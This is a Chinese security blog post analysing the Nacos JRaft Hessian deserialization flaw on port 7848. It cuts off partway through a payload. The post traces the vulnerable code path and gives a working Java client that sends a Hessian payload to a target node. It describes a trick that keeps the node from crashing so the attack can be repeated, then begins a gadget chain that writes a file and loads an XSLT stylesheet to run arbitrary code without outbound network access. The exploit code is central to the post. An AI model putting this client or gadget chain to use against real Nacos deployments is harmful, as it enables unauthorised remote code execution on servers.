<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="0x00 前言5月25日 Nacos 发布一条安全公告，声称其在 2.2.3 和 1.4.6 两个大版本修复了 7848 端口下一处 Hessian 反序列化漏洞；网上有许多分析，但没有一篇分析能够把问题阐述清楚且解决掉，于是写下这篇文章，仅做记录。 0x01 漏洞分析既然是 Hessian 反序列化，第一步要做的是查找对应的反序列化触发点，在项目中搜索 Hessian 可得到如下结果：  挨个查">
<meta property="og:type" content="article">
<meta property="og:title" content="Nacos JRaft Hessian 反序列化分析">
<meta property="og:url" content="https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html">
<meta property="og:site_name" content="___">
<meta property="og:description" content="0x00 前言5月25日 Nacos 发布一条安全公告，声称其在 2.2.3 和 1.4.6 两个大版本修复了 7848 端口下一处 Hessian 反序列化漏洞；网上有许多分析，但没有一篇分析能够把问题阐述清楚且解决掉，于是写下这篇文章，仅做记录。 0x01 漏洞分析既然是 Hessian 反序列化，第一步要做的是查找对应的反序列化触发点，在项目中搜索 Hessian 可得到如下结果：  挨个查">
<meta property="og:locale">
<meta property="og:image" content="https://p.ipic.vip/5wng90.png">
<meta property="og:image" content="https://p.ipic.vip/a5z2v2.jpg">
<meta property="og:image" content="https://p.ipic.vip/ebkugu.jpg">
<meta property="og:image" content="https://p.ipic.vip/dhicgx.jpg">
<meta property="og:image" content="https://p.ipic.vip/n2fc6o.jpg">
<meta property="og:image" content="https://p.ipic.vip/rhkidv.jpg">
<meta property="og:image" content="https://p.ipic.vip/hjgec5.jpg">
<meta property="og:image" content="https://p.ipic.vip/5vdpj4.jpg">
<meta property="og:image" content="https://p.ipic.vip/fjn88o.png">
<meta property="og:image" content="https://p.ipic.vip/ehdxik.jpg">
<meta property="og:image" content="https://p.ipic.vip/bc20nx.jpg">
<meta property="article:published_time" content="2023-06-14T06:57:28.000Z">
<meta property="article:modified_time" content="2023-06-14T07:13:17.700Z">
<meta property="article:author" content="p1g3">
<meta property="article:tag" content="漏洞分析">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://p.ipic.vip/5wng90.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Nacos JRaft Hessian 反序列化分析</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/post/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%A4%B1%E8%B4%A5%E7%9A%84%E7%BD%91%E7%BB%9C%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98%E5%BC%95%E6%93%8E%E8%96%85%E7%BE%8A%E6%AF%9B%E8%A1%8C%E5%8A%A8.html"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/post/hello-world.html"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&text=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&title=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&is_video=false&description=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Nacos JRaft Hessian 反序列化分析&body=Check out this article: https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&title=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&title=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&title=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&title=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&name=Nacos JRaft Hessian 反序列化分析&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&t=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">0x01 漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text">0x02 漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-0-%E6%97%A0%E6%8D%9F%E5%88%A9%E7%94%A8%E5%8E%9F%E7%90%86"><span class="toc-number">3.1.</span> <span class="toc-text">2.0 无损利用原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-1-%E6%9B%B4%E5%8A%A0%E9%80%9A%E7%94%A8%E7%9A%84-gadget"><span class="toc-number">3.2.</span> <span class="toc-text">2.1 更加通用的 gadget</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-2-%E4%B8%80%E4%B8%AA-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%8A%80%E5%B7%A7"><span class="toc-number">3.3.</span> <span class="toc-text">2.2 一个 Hessian 反序列化技巧</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-3-%E6%8E%A2%E6%98%8E-%E2%80%9C%E7%9C%9F%E6%AD%A3%E2%80%9D-%E7%9A%84%E6%BC%8F%E6%B4%9E%E5%BD%B1%E5%93%8D%E8%8C%83%E5%9B%B4"><span class="toc-number">3.4.</span> <span class="toc-text">2.3 探明 “真正” 的漏洞影响范围</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E6%AD%A6%E5%99%A8%E5%8C%96"><span class="toc-number">4.</span> <span class="toc-text">0x03 武器化</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Nacos JRaft Hessian 反序列化分析
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">p1g3</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-06-14T06:57:28.000Z" class="dt-published" itemprop="datePublished">2023-06-14</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" rel="tag">漏洞分析</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>5月25日 Nacos 发布一条安全公告，声称其在 <strong>2.2.3 和 1.4.6</strong> 两个大版本<a target="_blank" rel="noopener" href="https://github.com/alibaba/nacos/pull/10542">修复了 7848 端口下一处 Hessian 反序列化漏洞</a>；网上有许多分析，但没有一篇分析能够把问题阐述清楚且解决掉，于是写下这篇文章，仅做记录。</p>
<h2 id="0x01-漏洞分析"><a href="#0x01-漏洞分析" class="headerlink" title="0x01 漏洞分析"></a>0x01 漏洞分析</h2><p>既然是 Hessian 反序列化，第一步要做的是查找对应的反序列化触发点，在项目中搜索 Hessian 可得到如下结果：</p>
<p><img src="https://p.ipic.vip/5wng90.png" alt="image-20230614150339570"></p>
<p>挨个查看后发现 HessianSerializer 是实际反序列化的触发点，但代码中不会直接调用它，而是通过 SerializeFactory 根据预期的反序列化漏洞（JSON、Hessian）获取实际的反序列化实现类，默认的反序列化实现为 HessianSerializer：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">SerializeFactory</span> &#123;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">String</span> <span class="variable">HESSIAN_INDEX</span> <span class="operator">=</span> <span class="string">&quot;Hessian&quot;</span>.toLowerCase();</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> Map&lt;String, Serializer&gt; SERIALIZER_MAP = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;(<span class="number">4</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">String</span> <span class="variable">defaultSerializer</span> <span class="operator">=</span> HESSIAN_INDEX;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        <span class="type">Serializer</span> <span class="variable">serializer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HessianSerializer</span>();</span><br><span class="line">        SERIALIZER_MAP.put(HESSIAN_INDEX, serializer);</span><br><span class="line">        <span class="keyword">for</span> (Serializer item : NacosServiceLoader.load(Serializer.class)) &#123;</span><br><span class="line">            SERIALIZER_MAP.put(item.name().toLowerCase(), item);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Serializer <span class="title function_">getDefault</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> SERIALIZER_MAP.get(defaultSerializer);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Serializer <span class="title function_">getSerializer</span><span class="params">(String type)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> SERIALIZER_MAP.get(type.toLowerCase());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>搜索发现代码中并没有调用 getSerializer(“Hessian”) 的操作，因此转而继续搜索 SerializeFactory.getDefault()，得到如下结果：</p>
<p><img src="https://p.ipic.vip/a5z2v2.jpg" alt="image-20230613231747132"></p>
<p>继续分析后发现 JRaftProtocol、JRaftServer 等都不是实际的触发点，它们并不会调用 serializer.deserialize 方法，实际调用的只有 PersistentClientOperationServiceImpl、ServiceMetadataProcessor、InstanceMetadataProcessor、DistributedDatabaseOperateImpl 四个类。</p>
<p>观察后发现这几个类有几个共同点，比如都继承了 RequestProcessor4CP，并且都实现了 onApply、onRequest、group 这三个方法，根据之前审代码的经验，基本可以确定 Nacos 是<strong>根据 group 方法对应的 groupId 决定请求是下发给哪个类进行处理</strong>。</p>
<p><img src="https://p.ipic.vip/ebkugu.jpg" alt="image-20230613232859714"></p>
<p><img src="https://p.ipic.vip/dhicgx.jpg" alt="image-20230613232915768"></p>
<p>接下来的过程很痛苦，大致就是知道漏洞在哪，但不知道怎么调过去，最后参考了网上诸多文章，终于写出了个客户端 Demo：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.alibaba.nacos.consistency.entity.GetRequest;</span><br><span class="line"><span class="keyword">import</span> com.alibaba.nacos.consistency.entity.WriteRequest;</span><br><span class="line"><span class="keyword">import</span> com.alipay.sofa.jraft.option.CliOptions;</span><br><span class="line"><span class="keyword">import</span> com.alipay.sofa.jraft.rpc.RpcClient;</span><br><span class="line"><span class="keyword">import</span> com.alipay.sofa.jraft.rpc.impl.MarshallerHelper;</span><br><span class="line"><span class="keyword">import</span> com.alipay.sofa.jraft.rpc.impl.cli.CliClientServiceImpl;</span><br><span class="line"><span class="keyword">import</span> com.alipay.sofa.jraft.util.Endpoint;</span><br><span class="line"><span class="keyword">import</span> com.caucho.hessian.io.Hessian2Output;</span><br><span class="line"><span class="keyword">import</span> com.google.protobuf.ByteString;</span><br><span class="line"><span class="keyword">import</span> com.google.protobuf.Message;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JRaftClient</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span><span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="keyword">final</span> <span class="type">CliClientServiceImpl</span> <span class="variable">cliClientService</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">CliClientServiceImpl</span>();</span><br><span class="line">        cliClientService.init(<span class="keyword">new</span> <span class="title class_">CliOptions</span>());</span><br><span class="line">        setProperties(cliClientService.getRpcClient());</span><br><span class="line"></span><br><span class="line">        WriteRequest.<span class="type">Builder</span> <span class="variable">writeRequestBuilder</span> <span class="operator">=</span> WriteRequest.newBuilder().setGroup(<span class="string">&quot;naming_service_metadata&quot;</span>).setData(serialize(<span class="string">&quot;hessian_payload_object&quot;</span>));</span><br><span class="line">        <span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> cliClientService.getRpcClient().invokeSync(<span class="keyword">new</span> <span class="title class_">Endpoint</span>(<span class="string">&quot;172.16.0.8&quot;</span>, <span class="number">7848</span>), writeRequestBuilder.build(), <span class="number">10000</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@SuppressWarnings(&quot;unchecked&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setProperties</span><span class="params">(RpcClient rpcClient)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Field</span> <span class="variable">parserClasses</span> <span class="operator">=</span> rpcClient.getClass().getDeclaredField(<span class="string">&quot;parserClasses&quot;</span>);</span><br><span class="line">        parserClasses.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        Map&lt;String, Message&gt; map = (Map&lt;String, Message&gt;) parserClasses.get(rpcClient);</span><br><span class="line">        map.put(<span class="string">&quot;com.alibaba.nacos.consistency.entity.WriteRequest&quot;</span>, WriteRequest.getDefaultInstance());</span><br><span class="line">        map.put(<span class="string">&quot;com.alibaba.nacos.consistency.entity.GetRequest&quot;</span>, GetRequest.getDefaultInstance());</span><br><span class="line"></span><br><span class="line">        <span class="type">Field</span> <span class="variable">messages</span> <span class="operator">=</span> MarshallerHelper.class.getDeclaredField(<span class="string">&quot;messages&quot;</span>);</span><br><span class="line">        messages.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        Map&lt;String, Message&gt; messageMap = (Map&lt;String, Message&gt;) messages.get(MarshallerHelper.class);</span><br><span class="line">        messageMap.put(<span class="string">&quot;com.alibaba.nacos.consistency.entity.WriteRequest&quot;</span>, WriteRequest.getDefaultInstance());</span><br><span class="line">        messageMap.put(<span class="string">&quot;com.alibaba.nacos.consistency.entity.GetRequest&quot;</span>, GetRequest.getDefaultInstance());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> ByteString <span class="title function_">serialize</span><span class="params">(Object o)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">bos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">Hessian2Output</span> <span class="variable">out</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hessian2Output</span>(bos);</span><br><span class="line">        out.getSerializerFactory().setAllowNonSerializable(<span class="literal">true</span>);</span><br><span class="line">        out.writeObject(o);</span><br><span class="line">        out.close();</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> ByteString.copyFrom(bos.toByteArray());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中 WriteRequest 那段的 setData 则是用来设置反序列化的 payload，最终触发 Hessian 反序列化：</p>
<p><img src="https://p.ipic.vip/n2fc6o.jpg" alt="image-20230613233717974"></p>
<h2 id="0x02-漏洞利用"><a href="#0x02-漏洞利用" class="headerlink" title="0x02 漏洞利用"></a>0x02 漏洞利用</h2><p>上面是完整的漏洞原理分析，接下来解决一些网上说的普遍存在的问题。</p>
<h3 id="2-0-无损利用原理"><a href="#2-0-无损利用原理" class="headerlink" title="2.0 无损利用原理"></a>2.0 无损利用原理</h3><p>网传这个漏洞最大的问题就是打一次就崩，那么到底是为什么打一次就崩呢？经过深入分析发现，Nacos 在反序列化时并没有使用异常处理，导致 Hessian 反序列化后的对象与预期的对象不符，此时产生对象转换异常。</p>
<p><img src="https://p.ipic.vip/rhkidv.jpg" alt="image-20230613234201653"></p>
<p>产生异常后会将当前节点的状态设置为 STATE_ERROR，回溯历史调用栈发现 AbstractProcessor 会先获取 group 对应的 Node，并判断 Node 是否为 leaderNode，如果不是则返回错误，反之才会调用 execute 方法继续往下走。</p>
<p><img src="https://p.ipic.vip/hjgec5.jpg" alt="image-20230613234409053"></p>
<p>如果某个 Node 在反序列化时产生异常，则其状态为 State.STATE_ERROR，不符合 isLeader 的逻辑，因此无法正常服务：</p>
<p><img src="https://p.ipic.vip/5vdpj4.jpg" alt="image-20230613234438245"></p>
<p>那么应该如何解决这个问题呢，观察反序列化的代码可以发现预期是希望返回 MetadataOperation 对象：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MetadataOperation&lt;ServiceMetadata&gt; op = (MetadataOperation)<span class="built_in">this</span>.serializer.deserialize(request.getData().toByteArray(), <span class="built_in">this</span>.processType);</span><br></pre></td></tr></table></figure>

<p>这个对象有一个属性 metadata 是泛型，也就是它是任意类型都可以，所以<strong>不难想到我们可以构造一个 MetadataOperation 对象，并在其 metadata 属性设置恶意对象，这样设置可以让反序列化后的对象符合预期，不会产生报错，此时 Node 不触发异常，后续即可正常服务。</strong></p>
<h3 id="2-1-更加通用的-gadget"><a href="#2-1-更加通用的-gadget" class="headerlink" title="2.1 更加通用的 gadget"></a>2.1 更加通用的 gadget</h3><p>网传使用的 gadget 一般是 JNDI、BCEL，因为 JNDI 需要出网，且 BCELClassLoader 在 8.x 的较高版本中不存在了，因此算不上是比较完美的利用。那么就没有完美的利用了吗？其实并不是，通过 BCEL + 写文件就可以实现一个比较通用的解法。</p>
<p>利用 SwingLazyValue 结合 com.sun.org.apache.xml.internal.security.utils.JavaUtils 和 com.sun.org.apache.xalan.internal.xslt.Process 可以写入本地文件后通过 XSLT 加载最终实现不出网的任意代码执行。</p>
<p>相关代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javassist.ClassClassPath;</span><br><span class="line"><span class="keyword">import</span> javassist.ClassPool;</span><br><span class="line"><span class="keyword">import</span> javassist.CtClass;</span><br><span class="line"><span class="keyword">import</span> sun.swing.SwingLazyValue;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.swing.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Array;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Hashtable;</span><br><span class="line"><span class="keyword">import</span> java.util.Random;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">HessianPayload</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">final</span> <span class="keyword">static</span> <span class="type">String</span> <span class="variable">xsltTemplate</span> <span class="operator">=</span> <span class="string">&quot;&lt;xsl:stylesheet version=\&quot;1.0\&quot; xmlns:xsl=\&quot;http://www.w3.org/1999/XSL/Transform\&quot;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;xmlns:b64=\&quot;http://xml.apache.org/xalan/java/sun.misc.BASE64Decoder\&quot;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;xmlns:ob=\&quot;http://xml.apache.org/xalan/java/java.lang.Object\&quot;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;xmlns:th=\&quot;http://xml.apache.org/xalan/java/java.lang.Thread\&quot;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;xmlns:ru=\&quot;http://xml.apache.org/xalan/java/org.springframework.cglib.core.ReflectUtils\&quot;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;&gt;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;    &lt;xsl:template match=\&quot;/\&quot;&gt;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;      &lt;xsl:variable name=\&quot;bs\&quot; select=\&quot;b64:decodeBuffer(b64:new(),&#x27;&lt;base64_payload&gt;&#x27;)\&quot;/&gt;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;      &lt;xsl:variable name=\&quot;cl\&quot; select=\&quot;th:getContextClassLoader(th:currentThread())\&quot;/&gt;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;      &lt;xsl:variable name=\&quot;rce\&quot; 